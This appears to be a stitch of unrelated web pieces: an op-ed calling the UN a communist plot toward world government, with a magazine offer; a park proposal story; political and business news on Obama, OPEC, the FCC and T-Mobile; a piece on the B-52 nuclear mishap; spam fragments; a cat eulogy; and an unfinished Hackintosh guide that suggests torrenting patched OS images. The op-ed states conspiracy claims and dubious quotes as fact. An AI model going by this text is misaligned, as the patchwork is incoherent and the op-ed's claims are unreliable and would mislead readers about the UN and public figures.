In 1950 , during hearings of the Committee on Foreign Relations regarding Revision of the U.N. Charter , page 494 , the following statement was made by James P. Warburg :
We shall have world government , whether or not we like it .
The question is only whether world government will be achieved by consent ...
I am here to testify in favor ( of Resolution 56 ) , if concurrently enacted with the House , would make the peaceful transformation of the United Nations into a world federation the avowed aim of United States policy .
In the same year , the Senate held hearings on Senate Concurrent Resolution 66 for the U.N. Charter .
Sen .
Thomas stated , among other things :
Whereas , in order to achieve universal peace and justice , the present Charter of the United Nations should be changed to provide a true world government constitution .
Less than a decade after the United States partnered with this communist organization , members of Congress were already warning the American people of the real agenda of this anti-American organization :
What can this country , the United States , do to prevent the United Nations from destroying the Constitution of the United States of America and the constitution and laws of the various States of the Union ?
– Congressman Burdick , Congressional Record , 1953 , pg 797
Another equally important speech is found in the Congressional Record , April 22 , 1953 , pages A2080 - A2087 , by members of Congress warning that our participation in the United Nations represents the greatest threat to our freedom , our right to own private property and the danger of treaties .
Congressional Record , Jan. 15 , 1962 , pg 215 , Congressman James Utt :
According to Trygve Lie , longtime secretary - general of the United Nations , he stated flatly that there was a secret agreement between Alger Hiss and Molotov to the effect that the head of the United Nation 's military staff should always be a communist .
That agreement has never been broken and we have had a succession of communists filing that post ...
You can expect to see a one - world government , communist controlled , under the United Nations .
You will see the United Nations run up astronomical debts which we , under the terms of the treaty , are bound to pay ...
If this Republic is to perish , we ourselves , within our own household , will be the architect and finisher of our fate .
President George Bush , addressing the General Assembly of the United Nations , Feb. 1 , 1992 :
It is the sacred principles enshrined in the United Nations charter to which the American people will henceforth pledge their allegiance .
The son now carries forward the work of the father .
On April 16 , 1994 , the New York Times carried a huge ad which said :
1944 Bretton Woods : The IMF and the World Bank .
1945 San Francisco : The United Nations .
1994 Marrakech : The World Trade Organization .
History knows where it 's going .
The Final Act of the Uruguay Round , marking the conclusion of the most ambitious trade negotiation of our century will give birth – in Morocco – to the World Trade Organization , the third pillar of the New World Order , along with the United Nations and the International Monetary Fund .
America 's participation in the United Nations is grossly unconstitutional .
I invite you to see some very important documents from Judge J.J. Boesel ( retired ) : Complaint for Declaratory Judgment , Injunctive and Other Equitable Relief against the United Nations .
He also wrote a brilliant Motion of Oklahoma for Leave to File Complaint in Re A Treaty against the U.N .
Millions of Americans have been hounding Congress for decades to get us out of the United Nations .
However , this will not happen with this current Congress because they are the same Congress – with the exception of a half dozen new faces – that has been in there for over 10 years .
How many times are you going to ask the same career politician to do the same thing he or she has refused to do for over a decade ?
Congress will not move to get United States out of the United Nations because , regardless of who is the current president , the agenda is world government , which means no more America as an independent and sovereign nation .
Is there a solution ?
Yes , and my next column will focus on " Operation Cleansweep " and what you can do – freedom is not a spectator sport .
SUPER SPECIAL WEEKEND OFFER :
The upcoming January edition of WND 's acclaimed Whistleblower magazine – titled , " ENEMIES WITHIN : How the United Nations supports terrorists and fuels global chaos " – goes on sale early next week .
As a very special offer this weekend only , when you subscribe to Whistleblower , renew your subscription , or give a gift Whistleblower subscription , you 'll receive a hardcover copy of Joseph Farah 's powerful book " Taking America Back " as well as eight special Whistleblower issues – all FREE !
They are : " THE MYTH OF CHURCH - STATE SEPARATION , " " THE NEW WORLD RE - ORDER , " " THE END OF MARRIAGE ? , " " AMERICA DEFENSELESS , " INVASION USA ! , " " THE NEWS MAFIA , " " GREEN WITH ENVY " and " ABORTION : The 30 - Year War . "
Offer good in the U.S. only and while supplies last .
IMPORTANT NOTE : Whistleblower , which has not had a rate increase in several years , will go up in price on Feb .
1 . So subscribe , renew or give a gift subscription now and lock in the old , lower price !
It broke a record that day , the most rain to fall in Central Park for that day , I think it was 5.5 inches , and it felt like I absorbed most of it .
After watching the ducks for a while a couple came strolling down the walkway , hand in hand :
Only to stop on top of Bow Bridge .
He held her hand , kissed her , and talked for a few minutes :
And then it happened :
She was shocked , let out a scream , and forgot that she was holding on to an umbrella :
They held , and kissed , and said sweet nothings to each other .
They were on cloud nine !
And then it sank in : A few more minutes past to regain composure , and then he introduced us .
We gave our congratulations , provided some dry tissues and smiles .
A brief stroll through the park followed as we all walked back to the streets to get our cabs , but along the way we stopped for a photo or two to take advantage of the beautiful atmosphere only a rainy day can provide :
[ IFP does not endorse any federal candidate only encourages accountability of all politicans ]
philly.com
attytood
by Will Bunch
Obama would ask his AG to “ immediately review ” potential of crimes in Bush White House
< br .
Tonight I had an opportunity to ask Barack Obama a question that is on the minds of many Americans , yet rarely rises to the surface in the great ruckus of the 2008 presidential race — and that is whether an Obama administration would seek to prosecute officials of a former Bush administration on the revelations that they greenlighted torture , or for other potential crimes that took place in the White House .
Obama said that as president he would indeed ask his new Attorney General and his deputies to “ immediately review the information that ’s already there ” and determine if an inquiry is warranted — but he also tread carefully on the issue , in line with his reputation for seeking to bridge the partisan divide .
He worried that such a probe could be spun as “ a partisan witch hunt . ”
However , he said that equation changes if there was willful criminality , because “ nobody is above the law . ”
The question was inspired by a recent report by ABC News , confirmed by the Associated Press , that high - level officials including Vice President Dick Cheney and former Cabinet secretaries Colin Powell , John Ashcroft and Donald Rumsfeld , among others , met in the White House and discussed the use of waterboarding and other torture techniques on terrorism suspects .
I mentioned the report in my question , and said “ I know you ’ve talked about reconciliation and moving on , but there ’s also the issue of justice , and a lot of people — certainly around the world and certainly within this country — feel that crimes were possibly committed ” regarding torture , rendition , and illegal wiretapping .
I wanted to know how whether his Justice Department “ would aggressively go after and investigate whether crimes have been committed . ”
Here ’s his answer , in its entirety :
What I would want to do is to have my Justice Department and my Attorney General immediately review the information that ’s already there and to find out are there inquiries that need to be pursued .
I ca n’t prejudge that because we do n’t have access to all the material right now .
I think that you are right , if crimes have been committed , they should be investigated .
You ’re also right that I would not want my first term consumed by what was perceived on the part of Republicans as a partisan witch hunt because I think we ’ve got too many problems we ’ve got to solve .
So this is an area where I would want to exercise judgment — I would want to find out directly from my Attorney General — having pursued , having looked at what ’s out there right now — are there possibilities of genuine crimes as opposed to really bad policies .
And I think it ’s important– one of the things we ’ve got to figure out in our political culture generally is distinguishing betyween really dumb policies and policies that rise to the level of criminal activity .
You know , I often get questions about impeachment at town hall meetings and I ’ve said that is not something I think would be fruitful to pursue because I think that impeachment is something that should be reserved for exceptional circumstances .
Now , if I found out that there were high officials who knowingly , consciously broke existing laws , engaged in coverups of those crimes with knowledge forefront , then I think a basic principle of our Constitution is nobody above the law — and I think that ’s roughly how I would look at it .
The bottom line is that : Obama sent a clear signal that — unlike impeachment , which he ’s ruled out and which now seems a practical impossibility — he is at the least open to the possibility of investigating potential high crimes in the Bush White House .
To many , the information that waterboarding — which the United States has considered torture and a violation of law in the past — was openly planned out in the seat of American government is evidence enough to at least start asking some tough questions in January 2009 .
( Source )
The AP has called the race in the Illinois 14th for Democrat Bill Foster .
With more than 96 % of precincts reporting , Foster has a 52 - 48 lead over big- spending GOP candidate Jim Oberweis .
Think Rep. Tom Cole ( R - OK ) is having fun yet as chairman of the NRCC ?
Since taking over the NRCC after the 2006 midterms , he ’s struggled to compete with the DCCC financially , faced an ugly embezzlement scandal within the NRCC , and now lost the seat held by the last Republican Speaker of the House .
As I hinted at the other day , this race recalls Hastert ’s fall from power , the Mark Foley scandal and the general debacle of the last GOP Congress .
In some ways it ’s the coda to the 2006 elections .
But on the other hand , you ’ve got a Democrat winning in a special election in a Republican district against a well - funded opponent untainted by scandal .
So last hurrah of 2006 — or prelude to 2008 ?
By the way , we ’ll do this all over again in November .
Foster has won the right to fill the seat for the remainder of Hastert ’s term , when he ’ll face Oberweiss again .
Both men have already won their parties ’ nominations for the general election .
Late Update :
In a just released statement , the NRCC spins this one as sound and fury signifying nothing :
Faisant partie de la région Auvergne - Rhône - Alpes , Haute - Savoie est un département français voisin de la Suisse , avec une économie florissante .
S’installer en Haute - Savoie est une excellente idée compte …
WASHINGTON ( Reuters ) - The House of Representatives overwhelmingly approved legislation on Tuesday allowing the Justice Department to sue OPEC members for limiting oil supplies and working together to set crude prices , but the White House threatened to veto the measure .
Police officers stand guard on the rooftop of Vienna 's OPEC headquarters before the start of a meeting of OPEC oil ministers September 20 , 2005 .
REUTERS / Heinz - Peter Bader
The bill would subject OPEC oil producers , including Saudi Arabia , Iran and Venezuela , to the same antitrust laws that U.S. companies must follow .
The measure passed in a 324 - 84 vote , a big enough margin to override a presidential veto .
The legislation also creates a Justice Department task force to aggressively investigate gasoline price gouging and energy market manipulation .
“ This bill guarantees that oil prices will reflect supply and demand economic rules , instead of wildly speculative and perhaps illegal activities , ” said Democratic Rep. Steve Kagen of Wisconsin , who sponsored the legislation .
The lawmaker said Americans “ are at the mercy ” of OPEC for how much they pay for gasoline , which this week hit a record average of $ 3.79 a gallon .
The White House opposes the bill , saying that targeting OPEC investment in the United States as a source for damage awards “ would likely spur retaliatory action against American interests in those countries and lead to a reduction in oil available to U.S. refiners . ”
The administration said less oil going to refineries would limit available gasoline supplies and raise fuel prices .
Foreign investment in U.S. oil infrastructure has declined in the last decade .
But the state - owned oil companies of several OPEC nations are owners of U.S. refineries , and those investments could be affected if the legislation becomes law , said Arlington , Virginia - based FBR Capital Markets Corp .
The bill also requires the Government Accountability Office to carryout a study on the effects of prior oil company mergers on energy prices .
The Senate would still have to approve the House measure .
The Senate previously approved similar legislation as part of a broad energy bill .
However , the OPEC - suing provision was removed after White House opposition in order to get the underlying energy legislation signed into law .
A report released this month by the Pentagon has revealed the truth behind the B - 52 bomber — loaded with six live nuclear warheads — flying over the US , a mistake that could have had catastrophic consequences .
Their explanation : a 8.5 x 11 - inch sheet of printed paper used to differentiate between nuclear and conventional missiles .
Really , it can't get any more absurd than this :
Advertisement
On August 31 , 2007 an Air Force crew accidentally loaded six live nuclear warheads into a B - 52 Stratofortress — stationed in the Minot Air Force Base in North Dakota — believing they were conventional cruise missiles .
The weapons were missing , without anyone noticing it , for 36 hours until the B - 52 landed in Louisiana .
According to the Pentagon , this happened because the nuclear weapons were stored right next to conventional ones , with just an " 8.5 x 11 - inch sheet of printed paper to differentiate between the two types . "
I guess the paper was ignored by the ground crew .
I also guess that the paper said something like " Maybe this is bad .
Really .
No touchy !
Noooo touchy ! " instead of " NUCLEAR WARHEAD INSIDE .
DON'T TOUCH UNLESS INSTRUCTED BY THE COMMANDER IN CHIEF , YOU MORON " because , otherwise , I just can't understand their mistake .
Advertisement
The report goes on saying that " part " of the problem is that nobody really has absolute control of the nuclear weapons in the US arsenal after the demise of Strategic Air Command .
After the fall of the Soviet Union , SAC was split in 1992 into three different commands : the Air Force Space Command ( which grabbed ICBM control , ) the Air Combat Command ( in charge of the bombers themselves ) and the Air Mobility Command , which " provides airlift , special missions , aerial refueling , and aeromedical evacuation for U.S. troops . "
Furthermore , the Air Force nuclear capability is also under the control of the USSTRATCOM , along with the Navy 's submarine nuclear ballistic missiles .
G/O Media may get a commission LG 75 - Inch 8K TV Buy for $ 2150 from BuyDig Use the promo code ASL250
The report , however , then says that this " near disaster " was a " human error " because there are tight rules in place that were n't followed .
Col .
West Anderson , second in charge of the 2nd Bomb Wing at Barksdale AFB in Louisiana , added that they " handle weapons safely and ensure the highest possible standards of individual reliability and professional competence . "
I guess that means that the crew at Minot Air Force Base in North Dakota are a bunch of incompetent monkeys , but his guys are A - OK .
However , it all seems that they are just glad that nothing bad happened , so they can get away saving their asses .
Despite this " human error " excuse , their explanation leaves me with the impression that nobody has a real , definitive grasp of where every nuke is except probably Matthew Broderick and the WOPR .
Their conclusion does n't help either : the Air Force treats nukes the same as disarmed missiles when verifying armament , and there 's " no written directive that specifically described the required identifying means " to make the distinction before loading the weapons into the bombers .
Advertisement
In other words : there are rules which are not followed , but they need more rules in writing .
Perhaps they just need to stop playing Warhawk in their PlayStation 3 and start printing clearer warning signs .
[ Military.com , Wikipedia ]
Warum Bitcoin - Geldbesitzer diesen November mehr Gratismünzen erhalten Das Netzwerk von Bitcoin Cash könnte diesen November eine harte Abspaltung erfahren , und BCH - Inhaber könnten infolgedessen zusätzliche Münzen erhalten .
Inhaber von Bitcoin Cash ( BCH ) werden diesen November mit Sicherheit einige kostenlose Münzen erhalten , wenn die andauernde Konfrontation zwischen verschiedenen Gruppen in der Münzgemeinschaft mithilfe von Bitcoin System ihren …
Warum Bitcoin - Geldbesitzer diesen November mehr erhalten Read More »
A pet owner 's hardest decision
Muppy , a one - person cat if there ever was one .
Photo by Anne Shelley Muppy , a one - person cat if there ever was one .
Photo by Anne Shelley Image 1 of / 1 Caption Close
A pet owner 's hardest decision 1 / 1 Back to Gallery
The summer Muppy came home with me , the Bush in the White House was named George Herbert Walker , and the Clinton running for president was a little - known former governor of Arkansas .
Cutting - edge people were beginning to use e-mail .
I had yet to visit the World Wide Web .
It had been a difficult year .
My beloved old cat , Pepe , had died .
My father had been recently diagnosed with terminal cancer .
I sought lightness , humor , small comfort , nothing too serious .
I chose Muppy at the SPCA , ironically now , because she was young and pretty , kittenish but standoffish .
A calico , white underneath and mixed gray and orange tabby markings , she had a striped nose and two - toned ears .
She was just a year old but had already had a litter of kittens .
Her anxiety level suggested some problems in her early life , but I do n't know why she ended up at the shelter .
She hid for four solid days when I brought her home and freaked out every time I moved to a new apartment .
But she came to trust me , a trust that grew quickly to love and devotion .
I 'm fond of most cats and some people .
Muppy despised all other cats and nearly all people .
She was a one - person cat , and I was her person .
I know it 's not the healthiest situation , but it is gratifying to know another being builds her day around your arrival home .
She was my excuse for ducking out of social events early , avoiding long trips , eventually even working late .
I wish she had been nicer to other people .
Especially my boyfriend , who likes cats and was unfailingly gracious both to and about her .
She literally bit the hand of a friend who occasionally fed her .
( And I 'm weirdly proud of how vicious she became at the vet's .
They had a special notation about keeping her away from other animals on her chart , and the vet -- who has experience with large felines -- compared her attitude to that of a lion . )
At home , though , she was a comfort and a source of amusement every single day .
She kept up kitten behavior well into her teens , instigating games of Chase Me and hiding then popping out of my backpack .
Her long favorite toys were little plastic tabs from juice bottles , and she used to bring them onto the bed at night for play sessions .
For years I had the habit of sleepily stowing these under my pillow when so awakened .
She sat with me , or near me , or on me , when she could .
She talked loudly and a lot , informing me of meal times and birds flying by , and chiming in when I was on the phone .
She listened for my footsteps coming home or the sound of the shower turning off and always greeted me , anxious and meowing , at whatever door separated us .
Whether I was spacing out or reading or needing consolation after a hard day , she would sit on my lap on the couch or my chest on the bed and knead and purr .
Resting peacefully like that with Muppy was more soothing than medication , or Hawaii , or any therapy I can imagine .
At night she liked to sleep on my side , with her paws draped over my shoulder .
She was only nine and a half pounds at her heaviest , barely six the last years , delicate and light on her feet .
Over the years it 's not really surprising that my funny , second - hand casual - comfort kitty became such an essential part of me .
Of course she did .
Fifteen and a half years later I might as well have had " vulnerable " stamped on my forehead .
Muppy too .
This winter she left me .
It 's been cold and dark , and I 've been working intellectually toward pulling away for several weeks .
But now I 'm mostly just so so sad .
There were a few weeks of clear decline -- digestion problems , weight loss , an increasing number things she could no longer do .
A couple months ago I spent some time on the Pets forum on Craigslist reading other people 's stories of loss , and a recurring theme is that when it 's time , you 'll know .
It was , and I did , though part of me kept denying it , thinking she could pull through or there could just be another pill .
But she finally came to me , asking in her loud squawky voice for help , barely even able to blink her affection at me any more .
We spent the last morning just sitting together .
The Vet on Wheels guy came with a day 's notice up from Daly City and confirmed what I knew .
( True to form , she hissed at and peed on him . )
He was gentle and compassionate with both of us , and administered the shots while I curled next to her on the living room floor , wetting her fur with the tears I was unable to suppress .
Afterwards , he wrapped her little body in a towel with care and reverence , took it away in a carrier , and left me alone with my grief .
People have been so nice and sympathetic .
I volunteer at the shelter , so I can at least spend quiet time with other cats .
But it 's not the same , not even close , to what used to be my normal life .
At home , I can put down a plate of food without guarding it , walk across the kitchen barefoot with no stray litter to step on , sit down in black pants that stay black .
I could sleep for hours undisturbed , if only I could sleep .
Come home whenever I choose .
But coming home has been the worst .
Sometimes silence can break your heart .
First of all , let ’s get this straight : in order for Hillary Clinton to win , something really , really terrible has to happen to Barack Obama in the next few weeks .
I mean way more damaging than the Wright issue has been ( turns out that even the best smear campaign Fox News had to offer could only scratch the surface of his support ) .
We ’re talking “ Breaking : Barack Obama eats white babies to stay alive ” kind of bad news .
Without that storyline , there is absolutely no incentive for superdelegates to overthrow the wishes of the voters , especially with the added risk of losing the crucial African American voter bloc for a generation .
If Obama leads in the pledged delegates , popular vote , and states won , he will be the nominee .
Most superdelegates are elected officials themselves , and not a one of them will benefit from being branded a back - room machine politician .
I think even the most devoted Hillary supporters would have to admit that was true – Barack needs to SERIOUSLY stumble to give the Hilldawg any sort of an opening .
Given that , I believe she would actually be best served to suspend her campaign now .
Here ’s why :
If Hillary suspends her campaign now , she can freeze her plummeting negatives and make up some ground with people who were turned off by the tone of her campaign .
By beginning the job of reuniting the party , she will win back a lot of credit with people who are angry with her solely because of the ridiculous campaign she ’s run recently ( and there are a lot of them – not just in the general voting population but especially within the ranks of party - faithful superdelegates ) .
But even if scandal really does descend on Obama ’s campaign and ruin his chances , which is now really her only hope to the nomination , she ’ll be in a MUCH better position to win the nomination at the convention if she suspends now .
The reason ?
John Edwards .
By “ suspending ” his campaign , he left the door open to that all - important second vote at the convention .
By suspending it at the right time and going out with class , he built enormous goodwill with supporters on both sides .
And if something awful really does happen to Obama ’s campaign , Edwards will be right there in position , waiting to sweep up Obama ’s pledged delegates .
The longer Clinton continues this campaign , the more she drives those pledged delegates away – to the point where they would not even vote for her even if Obama is politically destroyed .
In fact , at the rate we ’re going right now , a lot of people would hold her accountable for that very destruction whether she had any hand in it or not .
Keep in mind that Obama ’s pledged delegates are his most committed supporters .
They are chosen by the campaign , and they are chosen largely for their loyalty and commitment to his candidacy .
Contrary to Mrs. Clinton ’s recently - stated wishes , they will not change their minds at the convention unless Obama ’s campaign is seriously broken .
And if it is broken , these delegates – the people who volunteered for him and served as precinct captains and made phone calls for him – are going to be MUCH more sympathetic to Mr. Edwards as long as Hillary continues to try to kneecap Obama .
And superdelegates will have a choice between someone who suspended their campaign for the good of the party – and someone who actually had their donors try to blackmail the entire DCCC to the detriment of every cause they claim to believe in .
Hillary can start rebuilding trust within the party if she suspends now – but if she does n’t , she had better watch her back for an Edwards offensive at the convention , because he would be most Obama supporters ’ second choice at this point .
Even though T - Mobile 's 3G network has been up and running for a few days now in NYC , they were modest about it until just now .
Fear not , folks , they talk up data plenty in the press release , though you 've gotta have a phone that can take advantage — and those are few and far between .
( They promise HSDPA " along with new and compelling data - centric , all - in - one devices " in " the coming months . " )
But in the meantime , enjoy crystal clear nagging from your mom over 3G !
No details on which other major markets will get 3G when , so you might wanna check the list we cribbed earlier .
T- Mobile says that the 3G service rolling out today is voice - only for now , but New York - based users
T- Mobile USA Begins Commercial 3G Network Rollout
Company Launches UMTS / HSDPA
Network in New York City on its AWS Spectrum ;
Plans 3G Network Launches in Major Markets Across the Country in the Coming Months
NEW YORK and BELLEVUE , Wash .
- May 5 , 2008 - T - Mobile USA , Inc. today announced that the company has taken the first commercial step in the rollout of its third - generation ( 3G ) wireless network by launching its UMTS / HSDPA network in New York City .
T- Mobile plans to continue the rollout of its 3G network across major metropolitan markets through the year .
By year 's end , T - Mobile expects its high - speed data network will be available in those cities where a majority of its subscribers currently use data services .
" The launch of our 3G network comes at a time when 3G phones and services are more affordable , capable and appealing to our consumer marketplace than ever before , " said Cole Brodman , chief development officer , T - Mobile USA .
" We benefit not only from the economic scale of 3G , but also from the extensive commercial experience of 3G in our European markets .
Today , T - Mobile USA customers already have among the highest adoption of data and messaging services in the industry .
Through our 3G network , we look forward to delivering a rich portfolio of new and meaningful services to enrich our customers ' lives . "
T- Mobile 's 3G network supports voice and data services consistent with available service and handset offerings .
The company today offers multiple phones that are able to operate on the UMTS network .
The phones are designed to automatically connect to the best available network ( 3G or GSM / GPRS / EDGE ) to provide the great call quality and rich communication services customers expect from T - Mobile .
Customers using a 3G - capable handset from T - Mobile will also experience faster data speeds when accessing the Web , or downloading content from the T - Mobile t- zones content portal , for example .
In the coming months , T - Mobile plans to offer its first HSDPA device , along with new and compelling data - centric , all - in - one devices that help make the most of T - Mobile 's high - speed data network .
The launch of the 3G network also enables T - Mobile to accommodate and serve more customers more efficiently through the use of its AWS spectrum , effectively doubling T - Mobile USA 's spectrum position , and laying the foundation for the company 's future growth .
T - Mobile and the U.S. government , namely the Department of Defense and the Department of Justice , continue to work closely and effectively together to make available AWS spectrum that will give consumers access to the 3G network .
As the 3G service rolls out in targeted major markets , T - Mobile will continue to build upon its
T- Mobile® HotSpot Wi -Fi network — its wireless high - speed Internet offering that launched in 2003 — and its nationwide voice and data network , to empower customers to effortlessly stay connected using the best available network .
The Federal Communications Commission defied some in Congress last year by easing a ban on ownership of a newspaper and a broadcast station in the same city .
On Thursday , the lawmakers took the first step toward getting even .
The Senate Commerce Committee unanimously approved a rare “ resolution of disapproval ” to invalidate the FCC ’s new rules , as concerns about media consolidation escalated in the wake of News Corp .'s negotiations to buy a second New York newspaper .
“ We really do literally have five or six major corporations in this country that determine for the most part what Americans see , hear and read every day , ” said Sen. Byron L. Dorgan ( D - N.D. ) , the lead sponsor of the resolution .
“ I do n’t think that ’s healthy for our country . ”
Dorgan has 25 senators behind his bill , including Democratic presidential candidates Hillary Rodham Clinton of New York and Barack Obama of Illinois , and is confident it will pass the Senate .
A similar bill has been proposed in the House .
Advertisement
The Bush administration has threatened a veto , but Dorgan could try to attach the resolution to a must - pass bill to make it harder for the White House to block .
Despite warnings from Dorgan and other lawmakers that he was acting rashly , FCC Chairman Kevin J. Martin pushed a plan through the agency in December allowing ownership of a newspaper and a broadcast TV or radio station in the 20 largest markets , with some limitations .
Tribune Co. , owner of the Los Angeles Times and KTLA - TV Channel 5 , was among the newspaper companies to back the changes , saying the struggling industry needed more freedom to consolidate with TV and radio stations in local markets .
To allow Tribune to close its deal to go private last year , the FCC granted the company a permanent waiver for its newspaper and broadcast combination in Chicago and two - year waivers for combinations in Los Angeles , New York , South Florida and Hartford , Conn .
If the FCC ’s new cross -ownership rules are invalidated , Tribune could be forced to sell some of its properties when the temporary waivers expire .
Advertisement
Martin , a Republican , defended the change in the cross - ownership rule Thursday .
“ I think it ’s important that we try to reform our media ownership rules to reflect the changes in the marketplace . . . particularly the challenges that the newspaper industry faces , ” he told reporters .
News Corp.'s pursuit of Newsday , a Tribune newspaper based in Melville on Long Island , has provided ammunition to opponents of media consolidation .
In New York , News Corp. already owns the New York Post and the Wall Street Journal , which is considered a national rather than a local paper , and two TV stations .
News Corp.'s deal for Newsday , valued at $ 580 million , probably would undergo an antitrust review by the Justice Department .
A Newsday purchase also would complicate News Corp .'s attempts to renew FCC licenses for its TV stations in the New York market , which expired last year .
Advertisement
--
jim.puzzanghera@latimes.com
Update :
This post is no longer maintained .
For the most up - to - date Hackintosh build , see our always up - to - date guide to building a Hackintosh .
Advertisement
If the high price tag for Apple hardware has kept you from buying a Mac but you 're willing to roll up your sleeves and get adventurous , you can build your own " Hackintosh " - a PC that runs a patched version of OS X Leopard .
What ?! , you say .
Apple 's move to Intel processors in 2006 meant that running OS X on non-Apple hardware is possible , and a community hacking project called OSx86 launched with that goal in mind .
Since then , OSx86 has covered major ground , making it possible for civilians - like you and me !- to put together their own Hackintosh running Mac OS 10.5 .
Today , I 'll show you how to build your own high end computer running Leopard from start to finish for under $ 800 .
Advertisement
Right now the cheapest Mac on sale at the Apple store is a $ 600 Mac Mini sporting a 1.83GHz proc , 1GB of RAM and an 80 GB hard drive .
For $ 200 more , your Hackintosh can boast a 2.2GHz proc with 4GB of RAM , a 500 GB drive , and a completely upgradeable case for expanding your setup in the future .
Building a DIY
Mac requires some work on your part , so be ready to dedicate time to this project .
To make things as easy as possible , I 'm going to lay out how I built my Hackintosh from start to finish , from the hardware I used to the final patches I applied to the Leopard install .
If you can build a Lego set and transcribe text , you 've got all the basic skills required .
The Hardware
There 's no definitive best bet for a Hackintosh hardware configuration , so you may be able to experiment and come up with a better selection of parts than I did .
However , I can guarantee that Leopard will ( or at least has ) run successfully on this hardware setup .
Advertisement
To make things easy , I 've put together my entire hardware setup as a wish list on Newegg .
( You may notice that the total price is listed at around $ 850 , but I knocked $ 110 off the price tag due to a couple of mail - in rebates - so " Under $ 800 " it remains , however fudgingly . )
Advertisement
The build consists of a 2.2GHz Intel Core 2 Duo processor , a total of 4GB of RAM ( four sticks at 1GB each ) , an ASUS P5W DH Deluxe motherboard , a GeForce 7300 GT ( the same basic video card that comes installed in the default Mac Pro configuration ) , a 500GB hard drive , a DVD burner , and an Antec Sonata case ( which I 've always liked for its looks and quiet fans ) .
The motherboard is the most important element , since the patches we 'll apply later are tailored specifically for this motherboard .
You could probably tweak a lot of the other hardware without many complications , but if you stick with this motherboard and follow the installation instructions , you should n't see any major complications .
The Build
Now that you 've got all the parts , it 's time to start putting your Mac together .
We 've detailed every step of the computer building process at one point or another in the past here on Lifehacker , so rather than cover that ground again , I 'll outline the process with links to our previous instructions .
As always , be sure to read your hardware manuals before you begin - particularly from the motherboard - to get to know your hardware before you start the installation .
Also , always remember to be careful of static electricity and always keep yourself grounded and your board unpowered until you 're finished .
Advertisement
Install the motherboard and CPU :
You can follow these instructions almost without variation , but the heatsink and fan installation , in particular , is a touch different .
Rather than hooking the heatsink to your motherboard , the included Intel heatsink pops into place .
For a more detailed description of how this works , consult your motherboard 's manual and the manual included with your processor .
Install your RAM :
The only thing you need to keep in mind when you 're installing the RAM is that you should install the matched pairs - that is , the pairs that come in the same package - in like colored slots .
This is n't strictly necessary , but it 's a good practice and generally means better performance .
Install the video card :
These instructions actually detail how to install a PCI card , which is just a more general way of looking at your video card .
The card we 're using is a PCI Express card and should be installed in the top ( orange ) PCI slot .
Install the hard drive and DVD drive :
Your hard drive is an SATA drive , which is not the type of drive installed in the instructions ( though they do address SATA drives ) .
Just connect one of the power supply 's SATA power cables to the drive and then connect the drive to the red SATA connector on your motherboard ( it 's labeled on the board as SATA1 ) .
Follow the same basic instructions to install your DVD drive but plug the drive into one of the other SATA ports ( I used the SATA4 port ) .
Advertisement
When you 've finished putting everything together , your open case should look like the nearly completed image below .
In that picture , I 've yet to install the hard drive and DVD drive and I still need to connect the case power and other connectors to the motherboard .
( You may install other features of the motherboard if you prefer , like the FireWire connector for the back of the case ) .
To make sure everything 's working properly , close it up , plug it into a monitor and keyboard and power it up .
If the computer boots into the BIOS ( by pressing Delete when prompted ) , you 're ready to move on .
If the computer wo n't boot , you may have to open the case back up and double - check your installation .
Among other things , be sure that your RAM is properly seated .
Advertisement
Advertisement
I should note that at this point of my installation , I ran into a bum power supply unit ( PSU ) in my case .
Unfortunately that meant that I did n't know whether the PSU was bunk or my motherboard was fried , and since I do n't own a voltage meter it took an extra trip to Fry 's and some troubleshooting to get to the bottom of it .
The point is that when you 're building a PC yourself , you can and should be prepared to run into snags , so if you 're not ready to troubleshoot if a problem arises , you may want to think twice before trying this .
That said , I 've built several PCs in the past and this was my only major snag in the course of a build , so it 's also very likely that your build could go off without a hitch .
Either way , as soon as you 're able to boot into the BIOS , you 're ready to get started with the pre-installation .
Advertisement
There are two things you need to tackle to prepare your computer for installation .
First , you 'll need to tweak your BIOS settings to properly work with the Leopard install .
Second , you need to patch the Leopard DVD to install on your newly built Hackintosh computer .
Advertisement
Tweak your BIOS :
The first thing I did once my build was finished was update my BIOS , since the default BIOS was n't properly recognizing my processor .
Luckily doing so is pretty simple .
Just head over to the ASUS download site , narrow down , and then download the latest BIOS for your motherboard .
Once downloaded , just stick the file on a USB flash drive .
Then boot up your build and enter the BIOS setup .
Like I said above , power on your computer and hit Delete when prompted to boot into the BIOS .
Once you 're there , arrow to the Tools tab of the BIOS , select EZ Flash2 , and then hit Enter .
Now choose your flash drive by tabbing to the appropriate drive , find the BIOS file you downloaded , and install it .
When the BIOS has updated , your computer should automatically restart .
Advertisement
Now that you 've updated your BIOS , you 're ready to get into some nitty gritty preparation .
If you plugged in your drives like I suggested during your build , you should see your hard drive and DVD drive listed in the BIOS as Third IDE Master and Fourth IDE Slave .
( Do n't worry about the fact that your hard drive is n't listed as the Primary IDE Master . )
Arrow down to IDE Configuration and hit Enter .
Advertisement
In the IDE config , you want to set " Configure SATA As " to AHCI .
Next hit Escape once to go back to the Main screen .
Now hit the right arrow key to move to the Advanced tab .
In the Advanced section go to " Onboard Devices Configuration " and set " JMicron SATA / PATA Controller " to Disabled .
Now you need to arrow over to the Boot tab to configure the boot priority ( which tells your computer what order you want to boot off devices in your computer ) .
Go to " Boot Device Priority " and set your DVD drive as priority one and your hard drive as priority two .
Advertisement
Done ?
Then you 're ready to move onto patching your Leopard DVD .
Patch Leopard for your Hackintosh :
There are a couple of different ways one could go about creating a patched Leopard DVD .
The easiest is probably to download an already patched version using BitTorrent ( I can attest to having seen the patched version floating around before Demonoid went under , but it 's probably available elsewhere as well ) .
The second method requires patching a Leopard DVD yourself , which is n't really as hard as it sounds .
Advertisement
If you decide to go the first route and you find a pre-patched version off BitTorrent , you can skip to the next section .
Otherwise , let 's get down to work .
To patch the Leopard install disc , you 'll need a Mac and a pre-patched image of the Leopard installer on your desktop .
You can get this in two ways :
Either by downloading the image - again with BitTorrent - or by buying and then ripping a Leopard DVD to your hard drive .
Either way you choose , when you 're finished you should place the ripped installer on your desktop and make sure that it 's named osx - leopard105.dmg .
Now it 's time to get patching .
To do so , you need to grab the patch files ( created by the resourceful OSx86 forum member BrazilMac , who bundled the patch files and whose instructions I followed for the installation ) , which you can download from one of many sources here under the " FILES FOR THIS GUIDE " section at the top of the page .
After you 've downloaded the zipped patch files , unzip the archive and drag all of the contents of the archive to your desktop ( it should contain two files and three folders in total ) .
Advertisement
UPDATE : We 've removed direct links to the forum post containing the patch files on the OSx86 Scene Forum .
Now open the 9a581 - patch.sh shell script in your favorite text editor .
At the top of the file , replace XXX with your username on your Mac ( so that it reflects the path to your current desktop ) .
For example , mine would look like :
APDIR=/ Users/adam / Desktop
